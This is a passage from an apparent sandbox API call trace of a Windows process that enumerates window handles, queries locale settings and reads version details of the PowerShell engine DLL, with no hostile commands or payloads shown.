hWnd=0x200e6, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.363] GetLastError () returned 0x514 [0134.363] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x90c [0134.363] GetLastError () returned 0x514 [0134.363] GetWindowThreadProcessId (in: hWnd=0x1301a0, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x890 [0134.363] GetLastError () returned 0x514 [0134.363] GetWindowThreadProcessId (in: hWnd=0x2023e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.364] GetLastError () returned 0x514 [0134.364] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.364] GetLastError () returned 0x514 [0134.364] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.364] GetLastError () returned 0x514 [0134.364] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.364] GetLastError () returned 0x514 [0134.364] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.364] GetLastError () returned 0x514 [0134.364] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.364] GetLastError () returned 0x514 [0134.364] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.364] GetLastError () returned 0x514 [0134.364] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.364] GetLastError () returned 0x514 [0134.365] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.365] GetLastError () returned 0x514 [0134.365] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.365] GetLastError () returned 0x514 [0134.365] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.365] GetLastError () returned 0x514 [0134.365] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.365] GetLastError () returned 0x514 [0134.365] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.365] GetLastError () returned 0x514 [0134.365] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.365] GetLastError () returned 0x514 [0134.365] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.365] GetLastError () returned 0x514 [0134.365] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x900 [0134.365] GetLastError () returned 0x514 [0134.365] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.366] GetLastError () returned 0x514 [0134.366] GetWindowThreadProcessId (in: hWnd=0x5019a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.366] GetLastError () returned 0x514 [0134.366] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x530 [0134.366] GetLastError () returned 0x514 [0134.366] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x678 [0134.366] GetLastError () returned 0x514 [0134.366] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x7e0 [0134.366] GetLastError () returned 0x514 [0134.366] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x4fc [0134.366] GetLastError () returned 0x514 [0134.366] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x28c [0134.366] GetLastError () returned 0x514 [0134.366] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x560 [0134.366] GetLastError () returned 0x514 [0134.367] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x2b0 [0134.367] GetLastError () returned 0x514 [0134.367] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x5c4 [0134.367] GetLastError () returned 0x514 [0134.367] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x7c8 [0134.367] GetLastError () returned 0x514 [0134.367] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x214 [0134.367] GetLastError () returned 0x514 [0134.367] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x460 [0134.367] GetLastError () returned 0x514 [0134.367] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x7f8 [0134.367] GetLastError () returned 0x514 [0134.367] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x90 [0134.367] GetLastError () returned 0x514 [0134.367] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x730 [0134.368] GetLastError () returned 0x514 [0134.368] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x228 [0134.368] GetLastError () returned 0x514 [0134.368] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x35c [0134.368] GetLastError () returned 0x514 [0134.368] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x7a0 [0134.368] GetLastError () returned 0x514 [0134.368] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x670 [0134.368] GetLastError () returned 0x514 [0134.368] GetWindowThreadProcessId (in: hWnd=0x60118, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x348 [0134.368] GetLastError () returned 0x514 [0134.368] GetWindowThreadProcessId (in: hWnd=0x20116, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6a4 [0134.368] GetLastError () returned 0x514 [0134.368] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6d4 [0134.369] GetLastError () returned 0x514 [0134.369] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6b0 [0134.369] GetLastError () returned 0x514 [0134.369] GetWindowThreadProcessId (in: hWnd=0x2013e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6d4 [0134.369] GetLastError () returned 0x514 [0134.369] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6b0 [0134.369] GetLastError () returned 0x514 [0134.369] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6d4 [0134.369] GetLastError () returned 0x514 [0134.369] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6a4 [0134.369] GetLastError () returned 0x514 [0134.369] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6a4 [0134.370] GetLastError () returned 0x514 [0134.370] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.370] GetLastError () returned 0x514 [0134.370] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.370] GetLastError () returned 0x514 [0134.370] GetWindowThreadProcessId (in: hWnd=0x200b0, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.370] GetLastError () returned 0x514 [0134.370] GetWindowThreadProcessId (in: hWnd=0x200b4, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.370] GetLastError () returned 0x514 [0134.370] GetWindowThreadProcessId (in: hWnd=0x200bc, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.370] GetLastError () returned 0x514 [0134.370] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.371] GetLastError () returned 0x514 [0134.371] GetWindowThreadProcessId (in: hWnd=0x800a0, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.371] GetLastError () returned 0x514 [0134.371] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x54c [0134.371] GetLastError () returned 0x514 [0134.371] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x43c [0134.371] GetLastError () returned 0x514 [0134.371] GetWindowThreadProcessId (in: hWnd=0x200a2, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x5a4 [0134.371] GetLastError () returned 0x514 [0134.371] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x588 [0134.371] GetLastError () returned 0x514 [0134.371] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x3a0 [0134.372] GetLastError () returned 0x514 [0134.372] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x544 [0134.372] GetLastError () returned 0x514 [0134.372] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.372] GetLastError () returned 0x514 [0134.372] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x518 [0134.372] GetLastError () returned 0x514 [0134.372] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.372] GetLastError () returned 0x514 [0134.372] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x4f0 [0134.372] GetLastError () returned 0x514 [0134.372] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.372] GetLastError () returned 0x514 [0134.373] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.373] GetLastError () returned 0x514 [0134.373] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x66c [0134.373] GetLastError () returned 0x514 [0134.373] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.373] GetLastError () returned 0x514 [0134.373] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.373] GetLastError () returned 0x514 [0134.373] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x3a0 [0134.373] GetLastError () returned 0x514 [0134.374] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x3a0 [0134.374] GetLastError () returned 0x514 [0134.374] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x124 [0134.374] GetLastError () returned 0x514 [0134.374] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x688 [0134.374] GetLastError () returned 0x514 [0134.374] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x3a0 [0134.374] GetLastError () returned 0x514 [0134.374] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x32c [0134.374] GetLastError () returned 0x514 [0134.374] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.374] GetLastError () returned 0x514 [0134.374] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x428 [0134.375] GetLastError () returned 0x514 [0134.375] GetWindowThreadProcessId (in: hWnd=0x401de, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x90c [0134.375] GetLastError () returned 0x514 [0134.375] GetWindowThreadProcessId (in: hWnd=0x2019c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x808 [0134.375] GetLastError () returned 0x514 [0134.375] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.375] GetLastError () returned 0x514 [0134.375] GetWindowThreadProcessId (in: hWnd=0x301a2, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x8c0 [0134.375] GetLastError () returned 0x514 [0134.375] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x530 [0134.375] GetLastError () returned 0x514 [0134.375] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x678 [0134.375] GetLastError () returned 0x514 [0134.375] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x7e0 [0134.376] GetLastError () returned 0x514 [0134.376] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x4fc [0134.376] GetLastError () returned 0x514 [0134.376] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x28c [0134.376] GetLastError () returned 0x514 [0134.376] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x560 [0134.376] GetLastError () returned 0x514 [0134.376] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x2b0 [0134.376] GetLastError () returned 0x514 [0134.376] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x5c4 [0134.376] GetLastError () returned 0x514 [0134.376] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x7c8 [0134.376] GetLastError () returned 0x514 [0134.376] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x214 [0134.377] GetLastError () returned 0x514 [0134.377] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x460 [0134.377] GetLastError () returned 0x514 [0134.377] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x7f8 [0134.377] GetLastError () returned 0x514 [0134.377] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x90 [0134.377] GetLastError () returned 0x514 [0134.377] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x730 [0134.377] GetLastError () returned 0x514 [0134.377] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x228 [0134.377] GetLastError () returned 0x514 [0134.377] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x35c [0134.377] GetLastError () returned 0x514 [0134.377] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x7a0 [0134.378] GetLastError () returned 0x514 [0134.378] GetWindowThreadProcessId (in: hWnd=0x90154, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x670 [0134.378] GetLastError () returned 0x514 [0134.378] GetWindowThreadProcessId (in: hWnd=0x3010e, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x348 [0134.378] GetLastError () returned 0x514 [0134.378] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6b0 [0134.378] GetLastError () returned 0x514 [0134.378] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6d4 [0134.378] GetLastError () returned 0x514 [0134.378] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x6a4 [0134.378] GetLastError () returned 0x514 [0134.378] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x54c [0134.378] GetLastError () returned 0x514 [0134.379] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x43c [0134.379] GetLastError () returned 0x514 [0134.379] GetWindowThreadProcessId (in: hWnd=0x20108, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x5a4 [0134.379] GetLastError () returned 0x514 [0134.379] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x4f0 [0134.379] GetLastError () returned 0x514 [0134.379] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x66c [0134.379] GetLastError () returned 0x514 [0134.379] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x3a0 [0134.379] GetLastError () returned 0x514 [0134.379] GetWindowThreadProcessId (in: hWnd=0x200fe, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x3a0 [0134.379] GetLastError () returned 0x514 [0134.379] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x12e870 | out: lpdwProcessId=0x12e870) returned 0x688 [0134.379] GetLastError () returned 0x514 [0134.379] GetLastError () returned 0x514 [0134.495] WerSetFlags () returned 0x0 [0134.720] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0134.721] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12ec4c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12ec48 | out: pulNumLanguages=0x12ec4c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12ec48) returned 1 [0134.721] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12ec4c, pwszLanguagesBuffer=0x2b4d5a4, pcchLanguagesBuffer=0x12ec48 | out: pulNumLanguages=0x12ec4c, pwszLanguagesBuffer=0x2b4d5a4, pcchLanguagesBuffer=0x12ec48) returned 1 [0134.845] GetUserDefaultLocaleName (in: lpLocaleName=0x509ca8, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0134.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.946] GetLastError () returned 0xcb [0134.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.962] GetLastError () returned 0xcb [0134.963] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0134.963] GetLastError () returned 0xcb [0135.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.016] GetLastError () returned 0xcb [0135.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12e6d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.016] GetLastError () returned 0xcb [0135.016] SetErrorMode (uMode=0x1) returned 0x1 [0135.016] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12eb58 | out: lpFileInformation=0x12eb58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0135.017] GetLastError () returned 0xcb [0135.017] SetErrorMode (uMode=0x1) returned 0x1 [0135.017] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12ebdc | out: lpdwHandle=0x12ebdc) returned 0x94c [0135.018] GetLastError () returned 0x0 [0135.018] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b4fad4 | out: lpData=0x2b4fad4) returned 1 [0135.019] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12eba8, puLen=0x12eba4 | out: lplpBuffer=0x12eba8*=0x2b4fb70, puLen=0x12eba4) returned 1 [0135.019] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x2b4fc4c, puLen=0x12eb20) returned 1 [0135.019] lstrlenW (lpString="Microsoft Corporation") returned 21 [0135.019] lstrcpyW (in: lpString1=0x509ca8, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0135.019] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x2b4fca0, puLen=0x12eb20) returned 1 [0135.019] lstrlenW (lpString="System.Management.Automation") returned 28 [0135.019] lstrcpyW (in: lpString1=0x509ca8, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0135.019] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x2b4fcfc, puLen=0x12eb20) returned 1 [0135.019] lstrlenW (lpString="6.1.7601.17514") returned 14 [0135.019] lstrcpyW (in: lpString1=0x509ca8, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0135.020] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x2b4fd3c, puLen=0x12eb20) returned 1 [0135.020] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0135.020] lstrcpyW (in: lpString1=0x509ca8, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0135.020] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x2b4fda4, puLen=0x12eb20) returned 1 [0135.020] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0135.020] lstrcpyW (in: lpString1=0x509ca8, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0135.020] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x2b4fe40, puLen=0x12eb20) returned 1 [0135.020] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0135.020] lstrcpyW (in: lpString1=0x509ca8, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0135.020] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x2b4fea4, puLen=0x12eb20) returned 1 [0135.020] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0135.020] lstrcpyW (in: lpString1=0x509ca8, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0135.020] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x2b4ff20, puLen=0x12eb20) returned 1 [0135.020] lstrlenW (lpString="6.1.7601.17514") returned 14 [0135.020] lstrcpyW (in: lpString1=0x509ca8, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0135.020] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x2b4fbc8, puLen=0x12eb20) returned 1 [0135.020] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0135.020] lstrcpyW (in: lpString1=0x509ca8, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0135.020] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: lplpBuffer=0x12eb24*=0x0, puLen=0x12eb20) returned 0 [0135.020] VerQueryValueW (in: pBlock=0x2b4fad4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12eb24, puLen=0x12eb20 | out: 